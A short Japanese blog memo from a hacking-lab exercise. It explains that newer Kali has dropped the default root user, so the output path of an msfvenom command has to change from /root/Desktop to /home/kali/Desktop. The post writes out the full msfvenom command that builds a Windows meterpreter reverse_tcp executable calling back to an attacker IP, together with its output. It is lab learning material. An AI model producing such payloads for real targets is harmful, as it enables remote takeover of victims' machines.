[ハッキング・ラボ]Kaliのrootユーザー廃止対応(msfvenom)

ちょっとしたことですがメモとして残します。

ハッキング・ラボのつくりかた 仮想環境におけるハッカー体験学習

この本の4-1 Windows7のハッキングの中で、msfvenomコマンドでペイロードを作る、というのがあります。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.2 -f exe -o /root/Desktop/evil.exe

これを実行すると以下のようになるのですが(最後の行に注目)

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Error: Permission denied @ rb_sysopen - /root/Desktop/evil.exe

/root下のDesktopに作ろうとしているので権限がないと怒られます。最近(2021年11月)のkaliはrootユーザーをデフォルトで廃止しているので自分が作業しているユーザーのデスクトップに作るほうがいいでしょう。
デフォルトユーザーはkaliなので次のように書きます。

/root/Desktop/evil.exe
# この部分を次のように書く
/home/kali/Desktop/evil.exe

ものすごく基本ですがpwdで今の位置を確認すればたいてい/home/kaliにいるはずです。(msfを起動した状態でもpwdが通ります)